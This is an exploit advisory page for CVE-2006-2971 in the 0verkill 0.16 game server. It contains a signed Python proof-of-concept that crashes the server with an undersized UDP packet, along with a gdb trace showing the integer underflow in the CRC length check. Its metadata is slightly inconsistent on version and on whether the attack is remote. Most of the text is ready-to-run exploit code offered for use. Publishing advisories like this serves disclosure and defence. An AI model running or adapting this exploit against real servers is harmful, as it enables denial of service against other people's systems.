0verkill 0.6, Remote integer overflow

2006-06-14 / 2006-06-15
Credit: Federico Fazzi (federico autistici org)
Risk: High
Local: Yes
Remote: No
CVE: CVE-2006-2971
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 #!/usr/bin/env python # # ----------------------------------------------------- # Exploit id: FSE:016 # # Author: Federico Fazzi # Contact: federico (at) autistici (dot) org [email concealed] # Date: 09/06/2006, 13:58 # Sinthesis: 0verkill 0.16, Remote integer overflow # Product: http://artax.karlin.mff.cuni.cz/~brain/0verkill/ # ----------------------------------------------------- # # Start with: # python f_0k-0.1.py <remote_addr> <remote_port> # # Proof of concept: # (gdb) run # Starting program: /home/federico/0verkill-0.16/server # 9. 6.2006 14:18:07 Running 0verkill server version 0.16 # 9. 6.2006 14:18:07 Initialization. # 9. 6.2006 14:18:07 Loading sprites. # 9. 6.2006 14:18:07 Loading level "level1".... # 9. 6.2006 14:18:07 Loading level graphics. # 9. 6.2006 14:18:08 Loading level map. # 9. 6.2006 14:18:08 Loading level objects. # 9. 6.2006 14:18:08 Initializing socket. # 9. 6.2006 14:18:08 Installing signal handlers. # 9. 6.2006 14:18:08 Game started. # 9. 6.2006 14:18:08 Sleep # 9. 6.2006 14:18:10 Wakeup # # (run python f_0k-0.6.py) # # Program received signal SIGSEGV, Segmentation fault. # crc32 (buf=0x837a000 <Address 0x837a000 out of bounds>, len=4294967288) at crc32.c:82 # warning: Source file is more recent than executable. # 82 DO8(buf); # # #0 0x0805b54a in recv_packet (packet=0x805fd20 "", # max_len=256, addr=0xf18df475, addr_len=0xf18df475, sender_server=0, recipient=0, # sender=0xbfcf6d54) at net.c:94 # 94 if (crc!=crc32(packet,retval-12))return -1; # # limits byte receive is 12, if you send an inferior number of it # the game crash. import os, sys from socket import * usage = "run: python %s [remote_addr] [remote_port] " % os.path.basename(sys.argv[0]) if len(sys.argv) < 3: print usage sys.exit() host = sys.argv[1] port = int(sys.argv[2]) sock = socket(AF_INET, SOCK_DGRAM) sock.connect((host, port)) print "connecting.. ", if sock > 0: print "done!" else: print "wrong!" print "crashing the server.. ", if sock.sendto('0x00' , (host, port)): print "done!" else: print "wrong!" print "wait five seconds, if no data found press CTRL+C" try: reply = sock.recvfrom(512) print reply except: print "no data receive!" sys.exit() -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEiXFc/yZYyBsK/94RAuQGAJ4lf2yqd3s7iXX6cbcRKPh3Yn89sgCgrDXv Kjh+GPu1bIFMp7wKVP8rSoU= =BAam -----END PGP SIGNATURE-----


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top